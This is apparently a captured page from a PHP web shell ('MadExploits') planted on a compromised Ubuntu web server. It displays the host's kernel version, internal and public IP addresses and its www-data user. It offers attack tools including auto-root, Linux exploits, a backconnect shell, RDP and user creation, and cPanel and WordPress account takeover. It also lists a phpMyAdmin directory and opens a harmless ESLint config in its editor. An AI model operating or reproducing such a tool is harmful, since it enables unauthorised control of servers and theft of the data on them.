Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.22.77.171
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
stage /
phpmyadmin /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwxr-xr-x
.github
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
bin
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
examples
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
.browserslistrc
175
B
-rw-r--r--
.editorconfig
315
B
-rw-r--r--
.eslintignore
63
B
-rw-r--r--
.eslintrc.json
2.63
KB
-rw-r--r--
.gitattributes
1.02
KB
-rw-r--r--
.gitignore
906
B
-rw-r--r--
.jshintrc
391
B
-rw-r--r--
.stylelintrc.json
1.19
KB
-rw-r--r--
.weblate
80
B
-rw-r--r--
CODE_OF_CONDUCT.md
3.19
KB
-rw-r--r--
CONTRIBUTING.md
2.53
KB
-rw-r--r--
ChangeLog
43.33
KB
-rw-r--r--
DCO
1.77
KB
-rw-r--r--
LICENSE
17.67
KB
-rw-r--r--
README
1.49
KB
-rw-r--r--
README.rst
2.98
KB
-rw-r--r--
babel.config.json
229
B
-rw-r--r--
codecov.yml
36
B
-rw-r--r--
composer.json
5.49
KB
-rw-r--r--
composer.lock
331.58
KB
-rw-r--r--
index.php
505
B
-rw-r--r--
infection.json5.dist
299
B
-rw-r--r--
jest.config.cjs
770
B
-rw-r--r--
package.json
2.68
KB
-rw-r--r--
phpcs.xml.dist
1.67
KB
-rw-r--r--
phpstan-baseline.neon
597.6
KB
-rw-r--r--
phpstan.neon.dist
695
B
-rw-r--r--
psalm-baseline.xml
614.08
KB
-rw-r--r--
psalm.xml
4.18
KB
-rw-r--r--
tsconfig.json
499
B
-rw-r--r--
webpack.config.cjs
18.55
KB
-rw-r--r--
yarn.lock
272.92
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .eslintrc.json
{ "extends": [ "eslint:recommended", "plugin:@typescript-eslint/eslint-recommended", "plugin:@typescript-eslint/recommended", "plugin:no-jquery/deprecated", "plugin:compat/recommended" ], "parser": "@typescript-eslint/parser", "plugins": [ "@typescript-eslint", "no-jquery" ], "parserOptions": { "ecmaVersion": 6, "sourceType": "module" }, "env": { "browser": true, "es6": true }, "rules": { "array-bracket-spacing": "error", "array-bracket-newline": ["error", { "multiline": true }], "array-element-newline": ["error", "consistent"], "brace-style": "error", "camelcase": "error", "comma-dangle": ["error", "only-multiline"], "comma-style": ["error", "last"], "curly": "error", "dot-notation": "error", "eol-last": "error", "eqeqeq": "error", "indent": ["error", 4], "keyword-spacing": "error", "lines-between-class-members": "error", "new-cap": "error", "no-array-constructor": "error", "no-eval": "error", "no-loop-func": "error", "no-multiple-empty-lines": "error", "no-new-func": "error", "no-new-object": "error", "no-param-reassign": "error", "no-prototype-builtins": "off", "no-redeclare": ["error", { "builtinGlobals": false }], "no-trailing-spaces": "error", "no-underscore-dangle": "error", "no-unneeded-ternary": "error", "no-var": "off", "object-curly-spacing": ["error", "always"], "one-var": ["error", "never"], "padded-blocks": ["error", "never"], "padding-line-between-statements": [ "error", { "blankLine": "always", "prev": "block-like", "next": "*" }, { "blankLine": "always", "prev": "multiline-expression", "next": "*" }, { "blankLine": "always", "prev": "*", "next": "return" } ], "prefer-const": "off", "prefer-rest-params": "off", "prefer-spread": "off", "quotes": ["error", "single"], "semi": "error", "space-before-blocks": "error", "space-before-function-paren": "error", "space-in-parens": "error", "space-infix-ops": "error", "spaced-comment": ["error", "always"], "wrap-iife": "error", "@typescript-eslint/ban-ts-comment": "off", "@typescript-eslint/no-empty-function": "off", "@typescript-eslint/no-explicit-any": "off", "@typescript-eslint/no-unused-vars": "off", "@typescript-eslint/no-this-alias": "off" } }
Close